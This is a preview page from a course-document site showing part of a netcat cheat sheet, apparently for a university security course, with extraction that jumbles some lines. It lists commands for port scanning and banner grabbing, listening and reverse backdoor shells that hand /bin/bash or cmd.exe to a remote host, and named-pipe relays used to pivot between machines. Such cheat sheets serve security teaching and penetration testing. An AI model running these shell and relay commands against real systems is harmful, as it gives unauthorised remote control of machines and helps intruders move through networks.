netcat_cheat_sheet_v1

w1 the randomize ports r switch can be used to choose

Info iconThis preview shows page 1. Sign up to view the full content.

View Full Document Right Arrow Icon
This is the end of the preview. Sign up to access the rest of the document.

Unformatted text preview: n), without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1) The randomize ports (-r) switch can be used to choose port numbers randomly in the range TCP Banner Grabber Grab the banner of any TCP service running on an IP Address from Linux: $ echo "" | nc –v –n –w1 [TargetIPaddr] [start_port]-[end_port] Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v), not resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a blank string to the open port and print out any banner received in response Add –r to randomize destination ports within the range Add –p [port] to specify a source port for the scan Backdoor Shells Listening backdoor shell on Linux: $ nc –l –p [LocalPort] –e /bin/bash Listening backdoor shell on Windows: C:\> nc –l –p [LocalPort] –e cmd.exe Netcat Relays on Linux To start, create a FIFO (named pipe) called backpipe: $ cd /tmp $ mknod backpipe p Listener-to-Client Relay: $ nc –l –p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee backpipe Create a relay that sends packets from the local port [LocalPort] to a Netcat client connected to [TargetIPaddr] on port [port] Listener-to-Listener Relay: $ nc –l –p [LocalPort_1] 0<backpipe | nc –l –p [LocalPort_2] | tee backpipe Create a relay that sends packets from any connection on [LocalPort_1] to any connection on [LocalPort_2] Create a shell on local port [LocalPort] that can then be accessed using a fundamental Netcat client Client-to-Client Relay: $ nc [PreviousHopIPaddr] [port] 0<backpipe | nc [NextHopIPaddr] [port2] | tee backpipe Reverse backdoor shell on Linux: $ nc [YourIPaddr] [port] –e /bin/bash Reverse backdoor shell on Windows: C:\> nc [YourIPaddr] [port] –e cmd.exe Create a relay that sends packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat client connected to [NextHopIPaddr] on port [port2] Create a reverse shell that will attempt to connect to [YourIPaddr] on local port [port]. This shell can then be captured using a fundamental nc listener...
View Full Document

This document was uploaded on 03/17/2014 for the course CS 393 at NYU Poly.

Ask a homework question - tutors are online